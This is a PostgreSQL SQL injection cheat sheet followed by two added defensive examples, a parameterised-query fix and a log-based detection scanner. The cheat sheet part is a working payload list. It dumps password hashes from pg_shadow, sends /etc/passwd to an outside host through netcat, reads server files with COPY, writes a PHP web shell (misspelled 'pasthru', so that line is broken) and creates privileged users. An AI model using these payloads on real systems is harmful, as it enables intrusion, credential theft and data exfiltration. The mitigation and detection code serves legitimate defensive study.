Postgres SQL Injection Cheat Sheet

This document provides a cheat sheet of useful SQL injection syntax for exploiting PostgreSQL databases, including commands to view database details like users, passwords, privileges and tables as well as execute operating system commands and access files on the server. Several queries require administrative privileges to run as they can alter the database or file system. The cheat sheet is intended to help highlight PostgreSQL injection techniques and areas that require further research.
Some useful syntax reminders for SQL Injection into PostgreSQL databases…

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to
researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with
"-- priv" at the end of the query.

Version
    SELECT version()

Comments
    SELECT 1; --comment
    SELECT /*comment*/1;

Current User
    SELECT user;
    SELECT current_user;
    SELECT session_user;
    SELECT usename FROM pg_user;
    SELECT getpgusername();

List Users
    SELECT usename FROM pg_user

List Password Hashes
    SELECT usename, passwd FROM pg_shadow -- priv

Password Cracker
    MDCrack can crack PostgreSQL's MD5-based passwords.

List Privileges
    SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

List DBA Accounts
    SELECT usename FROM pg_user WHERE usesuper IS TRUE

Current Database
    SELECT current_database()

List Databases
    SELECT datname FROM pg_database

List Columns
    SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
    WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid)
    AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

List Tables
    SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
    WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
    AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables From Column Name
    If you want to list all the table names that contain a column LIKE '%password%':
    SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
    WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid)
    AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';

Select Nth Row
    SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
    SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth Char
    SELECT substr('abcd', 3, 1); -- returns c

Bitwise AND
    SELECT 6 & 2; -- returns 2
    SELECT 6 & 1; -- returns 0

ASCII Value -> Char
    SELECT chr(65);

Char -> ASCII Value
    SELECT ascii('A');

Casting
    SELECT CAST(1 as varchar);
    SELECT CAST('1' as int);

String Concatenation
    SELECT 'A' || 'B'; -- returns AB

If Statement
    IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead.

Case Statement
    SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

Avoiding Quotes
    SELECT CHR(65)||CHR(66); -- returns AB

Time Delay
    SELECT pg_sleep(10); -- postgres 8.2+ only
    CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT;
    SELECT sleep(10); -- priv, create your own sleep function. Taken from here.

Make DNS Requests
    Generally not possible in postgres. However if contrib/dblink is installed (it isn't by default)
    it can be used to resolve hostnames (assuming you have DBA rights):
    SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') AS t(result TEXT);

    Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve
    hostnames, e.g. "ping pentestmonkey.net".

Command Execution
    CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv
    SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

Local File Access
    CREATE TABLE mydata(t text);
    COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by postgres OS-level user
    ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
    ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time ...
    DROP TABLE mydata;

    Write to a file:
    CREATE TABLE mytable (mycol text);
    INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
    COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as postgres OS-level user.
    Generally you won't be able to write to the web root, but it's always worth a try.
    -- priv user can also read/write files by mapping libc functions

Hostname, IP Address
    SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
    SELECT inet_server_port(); -- returns db server port (or null if using local connection)

Create Users
    CREATE USER test1 PASSWORD 'pass1'; -- priv
    CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time

Drop Users
    DROP USER test1; -- priv

Make User DBA
    ALTER USER test1 CREATEUSER CREATEDB; -- priv

Location of DB files
    SELECT current_setting('data_directory'); -- priv
    SELECT current_setting('hba_file'); -- priv

Default/System Databases
    template0
    template1
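Every row in the table above only works once attacker-controlled text reaches the statement itself. The following is an added example, not part of the original cheat sheet, showing the entry point beside its fix: a lookup that concatenates user input into the SQL text, and the same lookup with the value passed as a bound parameter. It uses an in-memory sqlite3 database as a stand-in because PostgreSQL is not available offline; the `products` table, the stand-in `pg_shadow` table and its placeholder hash are constructed for the demonstration, and the UNION ALL payload is the one from the "Local File Access" and "List Password Hashes" rows.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Build a constructed stand-in schema (sqlite3, not PostgreSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, price TEXT);
        INSERT INTO products VALUES ('widget', '9.99'), ('gadget', '19.99');
        -- constructed stand-in for the pg_shadow catalog; hash is a placeholder
        CREATE TABLE pg_shadow (usename TEXT, passwd TEXT);
        INSERT INTO pg_shadow VALUES ('postgres', 'md5-placeholder-hash');
        """
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Vulnerable: the caller's string becomes part of the SQL text,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    query = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Hardened: the value travels as a bound parameter and is never parsed
    as SQL. sqlite3 uses ? placeholders; psycopg2 uses %s with the same
    two-argument execute() call, and the principle is identical."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (name,)
    ).fetchall()


# The cheat sheet's UNION ALL pattern, aimed at the stand-in pg_shadow table.
PAYLOAD = "' UNION ALL SELECT usename, passwd FROM pg_shadow --"


if __name__ == "__main__":
    db = make_db()
    print("normal lookup :", lookup_safe(db, "widget"))
    print("unsafe + payload:", lookup_unsafe(db, PAYLOAD))
    print("safe + payload  :", lookup_safe(db, PAYLOAD))
```

With the concatenated query the payload returns the contents of the other table; with the bound parameter the same string is simply a product name that does not exist, and the result is empty. Parameterisation is the fix for the whole table, not for any one row of it.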

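On the detection side, almost every row above leaves a distinctive token in the statement text (pg_sleep, pg_shadow, COPY ... FROM/TO, dblink, LANGUAGE 'C', CHR()||CHR(), inet_server_addr, UNION ALL SELECT), so a PostgreSQL server logging with `log_statement = 'all'` records them. The following is an added example, not part of the original post: a small scanner that parses statement lines and flags those matching signatures derived from the rows in the table. The log lines are constructed for the example and assume a `log_line_prefix` of `'%m [%p] %u@%d '`; the rule names and the per-session threshold are my own choices.

```python
import re
from typing import Dict, List, Optional, Set

# Assumed log_line_prefix '%m [%p] %u@%d ' followed by the statement text.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<sql>.*)$"
)

# Signatures derived from the cheat-sheet rows; names are this example's own.
RULES: Dict[str, "re.Pattern[str]"] = {
    "time_delay": re.compile(r"\bpg_sleep\s*\(", re.I),
    "password_hashes": re.compile(r"\bpg_shadow\b", re.I),
    "catalog_enum": re.compile(r"\bpg_(user|database|class|namespace|attribute)\b", re.I),
    "file_access": re.compile(r"\bCOPY\b[^;]*\b(FROM|TO)\s*'[^']*'", re.I),
    "c_function": re.compile(r"\bLANGUAGE\s+'?C\b|libc\.so", re.I),
    "dblink": re.compile(r"\bdblink\s*\(", re.I),
    "quote_evasion": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "server_recon": re.compile(
        r"\binet_server_(addr|port)\s*\(|current_setting\s*\(\s*'(data_directory|hba_file)'", re.I
    ),
    "union_probe": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Constructed sample log lines: one benign query, then several shaped like rows above.
LOG_LINES = [
    "2024-05-01 10:00:00.101 UTC [4101] app@shop LOG:  statement: SELECT name, price FROM products WHERE id = 7",
    "2024-05-01 10:00:01.220 UTC [4101] app@shop LOG:  statement: SELECT name, price FROM products WHERE id = 7 UNION ALL SELECT usename, passwd FROM pg_shadow",
    "2024-05-01 10:00:02.390 UTC [4101] app@shop LOG:  statement: SELECT name, price FROM products WHERE id = 7 AND 1=(SELECT 1 FROM pg_sleep(10))",
    "2024-05-01 10:00:03.011 UTC [4102] app@shop LOG:  statement: COPY mydata FROM '/etc/passwd'",
    "2024-05-01 10:00:04.500 UTC [4102] app@shop LOG:  connection received: host=10.0.0.5 port=51234",
    "2024-05-01 10:00:05.700 UTC [4103] app@shop LOG:  statement: SELECT CHR(65)||CHR(66)",
]


def parse_statement(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of a 'statement:' log line, or None for other lines."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(sql: str) -> List[str]:
    """Names of every rule whose signature appears in the statement text."""
    return [name for name, pat in RULES.items() if pat.search(sql)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Walk the log and collect statements that match at least one rule."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        rec = parse_statement(line)
        if rec is None:
            continue
        hits = classify(rec["sql"])
        if hits:
            findings.append({"line": n, "pid": rec["pid"], "user": rec["user"], "rules": hits})
    return findings


def sessions_over_threshold(findings: List[Dict[str, object]], min_hits: int) -> Set[str]:
    """Backend PIDs with at least min_hits flagged statements: one odd query may be
    an admin, a run of them from one session looks like probing."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[str(f["pid"])] = counts.get(str(f["pid"]), 0) + 1
    return {pid for pid, c in counts.items() if c >= min_hits}


if __name__ == "__main__":
    found = scan_log(LOG_LINES)
    for f in found:
        print(f"line {f['line']} pid {f['pid']} user {f['user']}: {', '.join(f['rules'])}")
    print("sessions with repeated hits:", sessions_over_threshold(found, 2))
```

The catalog rule will fire on legitimate administrative tooling, so in practice the signal is the combination of rule hits, the application role that issued the statement, and repeated hits from one backend PID, which `sessions_over_threshold` surfaces.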